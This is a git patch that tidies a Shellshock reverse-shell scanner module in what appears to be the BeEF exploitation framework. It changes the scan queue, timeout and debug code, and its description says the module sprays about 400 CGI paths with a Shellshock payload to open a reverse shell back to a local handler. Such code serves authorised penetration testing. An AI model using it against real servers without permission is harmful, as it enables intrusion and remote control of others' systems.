From 8a8ea35265dbcf72498c8a73025971b887c0ed8d Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Tue, 6 Jan 2015 10:27:10 +0000 Subject: [PATCH] Module clean up --- modules/exploits/shell_shock_scanner/command.js | 14 ++++++-------- modules/exploits/shell_shock_scanner/config.yaml | 2 +- modules/exploits/shell_shock_scanner/module.rb | 3 +-- 3 files changed, 8 insertions(+), 11 deletions(-) diff --git a/modules/exploits/shell_shock_scanner/command.js b/modules/exploits/shell_shock_scanner/command.js index 98d768ae8..28c34dba6 100644 --- a/modules/exploits/shell_shock_scanner/command.js +++ b/modules/exploits/shell_shock_scanner/command.js @@ -13,7 +13,6 @@ beef.execute(function() { var target = rproto + '://' + rhost + ':' + rport; var method = '<%= @method %>'; var wait = '<%= @wait %>'; - var timeout = '<%= @timeout %>'; get_cgi = function(uri) { try { @@ -34,7 +33,8 @@ beef.execute(function() { } } - var scripts = new Array( + // add scripts to queue + var requests = new Array( <%= scripts = [] File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle| @@ -49,12 +49,10 @@ beef.execute(function() { %> ); - // add scripts to queue - var requests = []; - for (var i=0; i", <%= @command_id %>, "result=starting scan"); + beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)"); + var timeout = wait * requests.length + 10; var handle = setInterval(function() { if (requests.length > 0) { get_cgi(requests.pop()); @@ -64,7 +62,7 @@ beef.execute(function() { // clean up cleanup = function() { if (handle) { - beef.debug("Killing timer [ID: " + handle + "]"); + beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]"); clearInterval(handle); handle = 0; beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete"); diff --git a/modules/exploits/shell_shock_scanner/config.yaml b/modules/exploits/shell_shock_scanner/config.yaml index 06b6c3ac9..3e715f0ac 100644 --- a/modules/exploits/shell_shock_scanner/config.yaml +++ b/modules/exploits/shell_shock_scanner/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: "Exploits" name: "Shell Shock Scanner (Reverse Shell)" - description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.
The list of CGI scripts was taken from Shocker." + description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.
The list of CGI scripts was taken from Shocker.

The scan will take about 2 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below." authors: ["Stephane Chazelas", "mz", "bmantra", "radoen", "bcoles"] target: working: ["ALL"] diff --git a/modules/exploits/shell_shock_scanner/module.rb b/modules/exploits/shell_shock_scanner/module.rb index 3e084d3a1..4a796020a 100644 --- a/modules/exploits/shell_shock_scanner/module.rb +++ b/modules/exploits/shell_shock_scanner/module.rb @@ -30,8 +30,7 @@ class Shell_shock_scanner < BeEF::Core::Command { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost }, { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }, - { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' }, - { 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'} + { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' } ] end